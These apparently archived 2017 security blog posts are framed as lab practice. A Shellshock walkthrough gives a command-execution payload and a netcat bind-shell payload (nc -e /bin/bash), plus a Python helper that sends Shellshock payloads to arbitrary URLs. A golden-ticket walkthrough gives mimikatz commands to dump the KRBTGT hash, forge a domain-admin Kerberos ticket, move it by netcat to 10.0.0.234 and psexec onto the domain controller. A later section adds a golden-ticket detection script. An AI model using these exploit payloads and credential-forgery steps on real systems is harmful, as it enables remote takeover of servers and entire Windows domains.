Monday, December 11, 2017

Exploiting Shellshock - Pentesterlab.com

I like to keep my skills sharp; often I find myself downloading VMs from vulnhub.com, but I spend more time fixing or trying to get the VM running than actually practising pentesting. Then I found this site: www.pentesterlab.com. The material is very well organized, with videos and explanations of how to solve each puzzle/challenge. I especially like that I can download the ISO into my VMware and get it running without problems.

I'm working my way through the Essential lab at the moment; here is a sample exercise that Louis Nyffenegger gave me permission to repost.


CVE-2014-6271/Shellshock


This is not a new vulnerability: it was reported in 2014 and affected practically every Linux or Unix system running bash. It is simple to exploit; for the web vector you need only a browser and an intercepting proxy such as Burp.

Here I give a summary of how to exploit a Linux web server running a CGI application. Note that the Shellshock attack surface is not limited to the web: any service that passes attacker-controlled data into bash through an environment variable is exposed, and SSH, telnet and in some cases FTP have been used as vectors. For this example we inject the payload via the User-Agent header, which a CGI web server copies into the script's environment as HTTP_USER_AGENT; a vulnerable bash then imports the variable as a function definition and executes whatever follows the closing brace. You will need to intercept the request and send it to Repeater:

As you can see, the right pane shows JSON-formatted output containing the Linux server's uptime, and the URI points to a 'status' script. A CGI script that shells out to a system command like this is a good candidate for Shellshock. Let's try injecting a simple payload into the User-Agent header:

() { :;}; /sbin/ifconfig



I tried other commands such as whoami and id, but nothing appeared, which is why it is important to test different commands and see which ones work. With a positive result from the ifconfig command, I will now try to use netcat to listen on port 1234 on the victim machine :) Always remember to test the command with simpler flags to check that it's working. Thankfully, this was a Linux box, where nc usually supports the '-e' flag; most BSD variants don't. The complete command I used is:

() { :;}; /usr/bin/nc -lvp 1234 -e /bin/bash



The fact that the right pane didn't return any results is a good sign: it means the victim machine is executing netcat, and the CGI request hangs while nc waits for a connection. Time to connect to it:



There you go! For more great web pentesting exercises like this, please visit my friend Louis Nyffenegger's awesome website at www.pentesterlab.com
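The mechanics behind the Repeater steps above, as an added example that is not part of the PentesterLab exercise or the original post: the header-to-environment mapping a CGI server performs, the payload construction, a raw request builder, the classic local bash check, and a sender for an assumed target URL. The host name and path used in the usage call are placeholders.

```python
"""Shellshock (CVE-2014-6271) helpers: added example, not from the original post.

The CGI vector works because the web server copies every request header into
the CGI process environment (User-Agent becomes HTTP_USER_AGENT) and a
vulnerable bash, on seeing an environment value that starts with "() {",
imports it as a function definition and keeps executing whatever follows the
closing brace.
"""
import shutil
import subprocess
import urllib.request

# Same function-definition prefix the post uses; the injected command follows it.
PAYLOAD_PREFIX = "() { :;}; "


def cgi_env_from_headers(headers):
    """Mimic the RFC 3875 header-to-environment mapping a CGI server performs."""
    env = {}
    for name, value in headers.items():
        env["HTTP_" + name.upper().replace("-", "_")] = value
    return env


def shellshock_payload(command):
    """Header value that a vulnerable bash executes when it imports the variable."""
    return PAYLOAD_PREFIX + command


def build_request(host, path, command, header="User-Agent"):
    """Raw HTTP/1.1 request bytes with the payload in the chosen header."""
    lines = [
        f"GET {path} HTTP/1.1",
        f"Host: {host}",
        f"{header}: {shellshock_payload(command)}",
        "Connection: close",
        "",
        "",
    ]
    return "\r\n".join(lines).encode()


def local_bash_vulnerable():
    """Classic local check.

    Returns True if this machine's bash imports a function from the environment
    and runs the trailing command, False if it is patched, None if no bash binary
    is available. The environment is built from scratch so only our variable and
    a minimal PATH reach the child.
    """
    bash = shutil.which("bash")
    if bash is None:
        return None
    marker = "SHELLSHOCK_MARKER"
    env = {"PATH": "/usr/bin:/bin", "x": f"() {{ :;}}; echo {marker}"}
    proc = subprocess.run([bash, "-c", "echo probe"], env=env,
                          capture_output=True, text=True)
    return marker in proc.stdout


def send_payload(url, command, timeout=10):
    """Send the payload through the User-Agent header to an assumed target URL.

    Command output only comes back if the CGI script's response body carries
    it, which is why the post tries several commands before settling on one.
    """
    req = urllib.request.Request(url, headers={"User-Agent": shellshock_payload(command)})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode(errors="replace")


if __name__ == "__main__":
    # Placeholder host and path; the exercise's real target is not reproduced here.
    print(build_request("vulnerable.example", "/cgi-bin/status", "/sbin/ifconfig").decode())
    print("local bash vulnerable:", local_bash_vulnerable())
```

Two practical notes. The CGI environment usually carries no PATH (or a very short one), which is a common reason a bare `whoami` or `id` produces nothing while `/sbin/ifconfig` works; the post's payloads use absolute paths for that reason. And any output the injected command writes before the script's own `Content-Type` header can make the web server return a 500 instead of the body, so an apparently empty response does not by itself mean the command failed.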

Sunday, December 10, 2017

GitHub Gist

I have some scripts on GitHub Gist if anyone is interested. You may visit it here.

Friday, December 1, 2017

Windows Credential Attack - Part 2

In my last post, I wrote about passing the hash using the standard mimikatz tool. For this installment, I will demonstrate how to pass the ticket (PTT) using the same tool, in this case with a forged Kerberos TGT known as a 'golden ticket'. A golden ticket is a way of backdooring a Windows domain for the long term. Its advantage over passing the hash (PTH) is persistence: the ticket is encrypted and signed with the secret of the KRBTGT account, the built-in Active Directory (AD) account whose key the Key Distribution Center (KDC) uses for every TGT in the domain, so the forged ticket stays valid until that key changes. Resetting the KRBTGT password once is not enough, because the KDC still accepts tickets issued under the previous key; it has to be reset twice, with time for replication between the resets. Reinstalling or promoting a new DC into the same domain does not change the key either. Hence the name 'golden ticket'. A mimikatz golden ticket also carries a default group set that includes Domain Admins and Enterprise Admins, and a 10-year validity period!!! You virtually have full control of the domain/forest, allowing you to manipulate any object managed by the DC. Also, the user named in the ticket does not need to exist in AD, so it appears in no standard AD listing! You practically have God-like control over the entire enterprise domain!

In a nutshell, what I did was identify and dump the hash of the KRBTGT account, create a malicious ticket for a user called 'hacker4' associated with the corresponding SID/domain, save it, transfer it to 'client-pc' using netcat, and load it back into memory. I made a short video to demonstrate this simple technique using a Windows client PC (client-pc) and a Windows 2008 Domain Controller (server-dc). The tough job is obtaining SYSTEM privilege on server-dc to run mimikatz, which is out of scope for this post.

Summary of commands:

Steps On server-dc

privilege::debug
lsadump::lsa /inject /name:krbtgt
kerberos::golden /admin:hackerboy /domain:bubblegum.com /sid:S-1-5-21-4052271652-3634189325-3875401421 /krbtgt:409adfdd28b38f3decff6609fe0a19a1 
nc 10.0.0.234 1234 < ticket.kirbi

Steps On the client-pc

nc -nlpv 1234 > ticket.kirbi
kerberos::ptt ticket.kirbi
psexec64 \\server-dc cmd.exe
whoami /groups

P.O.C Recording



* Caveat: I recommend creating the golden ticket with the same name as the admin on the DC. Psexec64.exe can't seem to pass the ticket when the user you created on the DC doesn't match the ticket after a reboot.

kerberos::golden /admin:administrator /domain:bubblegum.com /sid:xxxxx /krbtgt:xxxx
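Two properties of the golden ticket described above (the account in the ticket need not exist in AD, and the TGT is forged offline so the DC never saw a TGT request for it) double as detection indicators. The following is an added example, not part of the original post and not from mimikatz: it runs that logic over a handful of constructed 4768/4769/4624-style security events for the post's bubblegum.com domain. The user list, the NetBIOS name BUBBLEGUM and the event contents are all constructed for the example.

```python
"""Golden-ticket indicator scan over Windows security events.

Added example, not from the original post and not part of mimikatz. Indicators:
  1. the account in a Kerberos or logon event does not exist in AD;
  2. a service-ticket request (4769) for an account with no preceding
     TGT request (4768), because a forged TGT is never requested from the KDC;
  3. (weak, assumption from public golden-ticket research) a 4624 logon whose
     domain field is the FQDN or blank rather than the NetBIOS name.
"""

# Assumed snapshot of sAMAccountNames in the domain (constructed for the example;
# in practice take it from a trusted AD export, not from the suspect DC alone).
KNOWN_USERS = {"administrator", "jsmith", "svc_backup"}

# NetBIOS name assumed for the post's bubblegum.com domain.
DOMAIN_NETBIOS = "BUBBLEGUM"

# Constructed events modelled on the Windows security log fields.
SAMPLE_EVENTS = [
    # Normal chain: jsmith requests a TGT, then a service ticket, then logs on.
    {"EventID": 4768, "TargetUserName": "jsmith", "TargetDomainName": "BUBBLEGUM.COM",
     "IpAddress": "10.0.0.50"},
    {"EventID": 4769, "TargetUserName": "jsmith@BUBBLEGUM.COM", "TargetDomainName": "BUBBLEGUM.COM",
     "ServiceName": "cifs/server-dc", "IpAddress": "10.0.0.50"},
    {"EventID": 4624, "TargetUserName": "jsmith", "TargetDomainName": "BUBBLEGUM",
     "LogonType": 3, "IpAddress": "10.0.0.50"},
    # Suspicious chain: 'hackerboy' (the principal forged in the post) obtains a
    # service ticket and a network logon with no TGT request and no AD account.
    {"EventID": 4769, "TargetUserName": "hackerboy@bubblegum.com", "TargetDomainName": "bubblegum.com",
     "ServiceName": "cifs/server-dc", "IpAddress": "10.0.0.234"},
    {"EventID": 4624, "TargetUserName": "hackerboy", "TargetDomainName": "bubblegum.com",
     "LogonType": 3, "IpAddress": "10.0.0.234"},
]


def account_name(event):
    """sAMAccountName in lower case, with any @REALM suffix removed."""
    return event["TargetUserName"].split("@", 1)[0].lower()


def scan_for_golden_ticket(events, known_users=KNOWN_USERS, netbios=DOMAIN_NETBIOS):
    """Return (event_index, reason) pairs for events matching golden-ticket indicators."""
    known = {u.lower() for u in known_users}
    tgt_requesters = {account_name(e) for e in events if e["EventID"] == 4768}
    findings = []
    for i, e in enumerate(events):
        if e["EventID"] not in (4768, 4769, 4624):
            continue
        user = account_name(e)
        if user.endswith("$"):  # computer accounts are out of scope for this check
            continue
        if user not in known:
            findings.append((i, f"account '{user}' does not exist in AD"))
        if e["EventID"] == 4769 and user not in tgt_requesters:
            findings.append((i, f"service ticket for '{user}' without a prior TGT request (4768)"))
        if e["EventID"] == 4624 and e.get("TargetDomainName", "").upper() != netbios:
            findings.append((i, f"logon domain '{e.get('TargetDomainName')}' is not the NetBIOS name '{netbios}'"))
    return findings


if __name__ == "__main__":
    for idx, reason in scan_for_golden_ticket(SAMPLE_EVENTS):
        print(f"event {idx} ({SAMPLE_EVENTS[idx]['EventID']}): {reason}")
```

The "no prior 4768" rule only makes sense over a window long enough to contain the legitimate TGT request (TGTs live for hours, so scan at least the previous day), and the domain-format rule is a hint rather than proof, so treat a hit on indicator 1 or 2 as the one worth acting on. The remedy the section above describes, resetting the KRBTGT password twice with replication time between the resets, is what actually invalidates a ticket once found.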